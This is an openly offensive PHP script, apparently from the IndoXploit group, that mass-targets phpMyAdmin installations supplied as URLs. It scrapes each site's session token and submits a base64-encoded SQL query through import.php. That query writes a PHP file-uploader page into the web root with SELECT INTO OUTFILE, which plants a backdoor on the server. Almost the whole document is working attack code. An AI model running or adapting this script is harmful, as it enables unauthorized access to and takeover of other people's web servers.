phpmyadmin upload file

1. <html>
2. <center><h1>Auto File Upload phpMyAdmin</h1>
3. <form method="post" action="" enctype="multipart/form-data">
4. <textarea placeholder="Enter Target Url !" style="padding: 5px; resize: none; width: 400px; height: 200px; border: solid 1px #006400;" name="urls"></textarea><br>
5. <input type="submit" name="submit" value="Submit" style="margin: 5px auto; hight: 25px; width: 200px;">
6.  
7. </form><center></html>
8.  
9. <?php
10. //Tu5b0l3d
11. //Auto upload uploader in phpmyadmin
12. cover();
13. error_reporting(0);
14. set_time_limit(0);
15. $site = $_POST['urls'];
16. $sql = "phpmyadmin/import.php";
17. $sql2 = "phpmyadmin/server_sql.php";
18. $file = "dhcteam.php";
19.  
20. function anuu($url, $dir){
21.  $ch1 = curl_init("$url/$dir");
22. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
23. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
24. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
25. curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 5);
26. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
27. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
28. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
29. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
30. $data = curl_exec ($ch1);
31. return $data;
32. }
33.  
34. function ambilKata($param, $kata1, $kata2){
35.         if(strpos($param, $kata1) === FALSE) return FALSE;
36.         if(strpos($param, $kata2) === FALSE) return FALSE;
37.         $start = strpos($param, $kata1) + strlen($kata1);
38.         $end = strpos($param, $kata2, $start);
39.         $return = substr($param, $start, $end - $start);
40.         return $return;
41. }
42.  
43. function cover(){
44.                     if(isset($_POST['submit']))
45.         echo "\n\n\t############# IndoXploit #############\n";
46.         echo "\t#########  Thx To: HNc, IBT  #########\n\n";
47. }
48.  
49. function upload22($urlq, $path, $toket, $shell){
50.                 $post = array(
51.                                         "is_js_confirmed" => "0",
52.                                         "token" => "$toket",
53.                                         "pos" => "0",
54.                                         "goto" => "server_sql.php",
55.                                         "zero_rows" => "Your SQL query has been executed successfully",
56.                                         "sql_query" => "$shell",
57.                                         "bkm_label" => "",
58.                                         "bkm_all_users" => "",
59.                                         "bkm_replace" => "true",
60.                                         "sql_delimiter" => ";",
61.                                         "show_query" => "1",
62.                                         "SQL" => "Go",
63.                                         );
64. $ch = curl_init ("$urlq/$path");
65. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
66. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
67. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
68. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
69. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
70. curl_setopt ($ch, CURLOPT_POST, 1);
71. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
72. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
73. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
74. $data6 = curl_exec ($ch);
75. return $data6;
76. }
77.  
78.  
79. $toket = anuu($site, $sql2);
80. $toket_asli = ambilkata($toket,"name=\"token\" value=\"","\" />");
81.  
82.  
83. $shell = base64_decode("dXNlIG15c3FsOw0KRFJPUCBUQUJMRSBJRiBFWElTVFMgYHRlbXB0YWJgOw0KQ1JFQVRFIFRBQkxFIHRlbXB0YWIgKGNvZGV0YWIgdGV4dCk7DQpJTlNFUlQgSU5UTyB0ZW1wdGFiIChjb2RldGFiKSBWQUxVRVMgKA0KJzx0aXRsZT5VcGxvYWQgRmlsZTwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KPCEtLQ0KYm9keSx0ZCx0aCB7DQpjb2xvcjogIzBGMDsNCn0NCmJvZHkgew0KYmFja2dyb3VuZC1jb2xvcjogIzk5OTsNCn0NCi0tPg0KPC9zdHlsZT48cD5nYW50ZW5nDQo8Zm9ybSBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiA+DQo8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgLz4NCjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJVcGxvYWQiIC8+DQo8L2Zvcm0+DQo8cD4NCjxzdHJvbmc+DQo8P3BocA0KaWYgKCRfRklMRVNbImZpbGUiXSAhPSAiIikgew0KY29weSgkX0ZJTEVTWyJmaWxlIl1bInRtcF9uYW1lIl0sICRfRklMRVNbImZpbGUiXVsibmFtZSJdKSBvciBkaWUgKCJQcm9zZXMgdXBsb2FkIEdhZ2FsOiAiKTsNCn1lbHNlIHsNCmRpZSgiU2lsYWhrYW4gcGlsaWggZmlsZSIpOw0KfQ0KPz4NCkZpbGUgYmVyaGFzaWwgZGl1cGxvYWQ6PGJyIC8+DQpLZXRlcmFuZ2FuIEZpbGU6PGJyIC8+DQpOYW1hIEZpbGU6IDw/cGhwIGVjaG8gJF9GSUxFU1siZmlsZSJdWyJuYW1lIl07ID8+PGJyIC8+DQpVa3VyYW4gRmlsZTogPD9waHAgZWNobyAkX0ZJTEVTWyJmaWxlIl1bInNpemUiXTs/PiBCeXRlcyA8YnIgLz4NCkplbmlzIEZpbGU6IDw/cGhwIGVjaG8gJF9GSUxFU1siZmlsZSJdWyJ0eXBlIl07ID8+PC9zdHJvbmc+PC9wPg0KDQonDQopOw0KU0VMRUNUICogSU5UTyBPVVRGSUxFICdDOi94YW1wcC9odGRvY3Mvbi5waHAnIGZyb20gdGVtcHRhYjsNCkRST1AgVEFCTEUgdGVtcHRhYjsNCkZMVVNIIExPR1M7DQo=");
84. $upload = upload22($site, $sql, $toket_asli, $shell);
85. $files = anuu($site, $file);
86. if(preg_match("#ganteng#i",$files)){
87.                 echo "# Berhasil Nanem Uploader\n$site/$file\n\n";
88. }
89. else{
90.         echo "# Gagal~\n";
91.  
92.  
93. }
94.  
95.  
96.  
97. ?>